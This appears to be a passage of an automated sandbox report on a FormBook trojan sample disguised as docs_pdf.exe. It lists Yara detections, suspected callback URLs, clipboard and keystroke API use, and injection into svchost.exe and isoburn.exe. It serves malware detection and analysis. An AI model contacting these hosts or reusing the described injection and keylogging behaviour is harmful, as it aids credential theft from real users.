URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:06:07 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://411divorce.com/6rlx/?D0Pts04=Q2ZAF
            Source: firefox.exe, 0000000A.00000002.2775625932.0000020038AA0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
            Source: isoburn.exe, 00000005.00000002.4553311671.00000000066AE000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000462E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wordpress.org/extend/plugins/nginx-helper/faq/
            Source: HDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sgbet777.org
            Source: HDtHilbfKZE.exe, 00000007.00000002.4553969990.00000000052B3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.sgbet777.org/aiec/
            Source: isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.000000000651C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.000000000449C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://301mei.xyz:7788/?u=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000005.00000002.4555303639.00000000075E0000.00000004.00000800.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 00000005.00000003.2668197525.000000000786B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: isoburn.exe, 00000005.00000002.4549871592.0000000000BE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 00000005.00000002.4555382292.000000000788E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005ED4000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.evoolihubs.shop/fwdd/?D0Pts04=K/pqHoAOWNF4P
            Source: isoburn.exe, 00000005.00000002.4553311671.0000000005BB0000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000002.4551468218.0000000003B30000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?hl=en
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0016425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00164458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00164458
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0016425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0016425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00150219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00150219
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0017CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0017CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_000F3B4C
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: docs_pdf.exe, 00000000.00000000.2088726475.00000000001A5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b6e405be-b
            Source: docs_pdf.exe, 00000000.00000000.2088726475.00000000001A5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a35b5956-7
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f695eb0e-8
            Source: docs_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3212d1d6-5
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: docs_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BBA3 NtClose,2_2_0042BBA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A4650 NtSuspendThread,LdrInitializeThunk,5_2_048A4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A4340 NtSetContextThread,LdrInitializeThunk,5_2_048A4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_048A2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C60 NtCreateKey,LdrInitializeThunk,5_2_048A2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048A2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DD0 NtDelayExecution,LdrInitializeThunk,5_2_048A2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_048A2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_048A2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_048A2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_048A2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_048A2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FB0 NtResumeThread,LdrInitializeThunk,5_2_048A2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FE0 NtCreateFile,LdrInitializeThunk,5_2_048A2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F30 NtCreateSection,LdrInitializeThunk,5_2_048A2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AD0 NtReadFile,LdrInitializeThunk,5_2_048A2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AF0 NtWriteFile,LdrInitializeThunk,5_2_048A2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_048A2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_048A2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_048A2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2B60 NtClose,LdrInitializeThunk,5_2_048A2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A35C0 NtCreateMutant,LdrInitializeThunk,5_2_048A35C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A39B0 NtGetContextThread,LdrInitializeThunk,5_2_048A39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CC0 NtQueryVirtualMemory,5_2_048A2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CF0 NtOpenProcess,5_2_048A2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C00 NtQueryInformationProcess,5_2_048A2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DB0 NtEnumerateKey,5_2_048A2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D00 NtSetInformationFile,5_2_048A2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2EA0 NtAdjustPrivilegesToken,5_2_048A2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2E30 NtWriteVirtualMemory,5_2_048A2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F90 NtProtectVirtualMemory,5_2_048A2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FA0 NtQuerySection,5_2_048A2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F60 NtCreateProcessEx,5_2_048A2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AB0 NtWaitForSingleObject,5_2_048A2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2B80 NtQueryInformationFile,5_2_048A2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3090 NtSetValueKey,5_2_048A3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3010 NtOpenDirectoryObject,5_2_048A3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3D10 NtOpenProcessToken,5_2_048A3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3D70 NtOpenThread,5_2_048A3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_008280F0 NtClose,5_2_008280F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00828050 NtDeleteFile,5_2_00828050
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00828250 NtAllocateVirtualMemory,5_2_00828250
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00827E00 NtCreateFile,5_2_00827E00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00827F60 NtReadFile,5_2_00827F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468D3DC NtSetContextThread,5_2_0468D3DC
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00154021
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00148858
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0015545F
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000FE8000_2_000FE800
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011DBB50_2_0011DBB5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0017804A0_2_0017804A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000FE0600_2_000FE060
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001041400_2_00104140
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001124050_2_00112405
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001265220_2_00126522
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0012267E0_2_0012267E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001706650_2_00170665
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011283A0_2_0011283A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001068430_2_00106843
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001289DF0_2_001289DF
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00108A0E0_2_00108A0E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00126A940_2_00126A94
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00170AE20_2_00170AE2
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00158B130_2_00158B13
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0014EB070_2_0014EB07
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011CD610_2_0011CD61
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001270060_2_00127006
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0010710E0_2_0010710E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001031900_2_00103190
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000F12870_2_000F1287
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001133C70_2_001133C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011F4190_2_0011F419
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001056800_2_00105680
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001116C40_2_001116C4
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001178D30_2_001178D3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001058C00_2_001058C0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00111BB80_2_00111BB8
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00129D050_2_00129D05
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000FFE400_2_000FFE40
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00111FD00_2_00111FD0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011BFE60_2_0011BFE6
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_036E35E00_2_036E35E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004038402_2_00403840
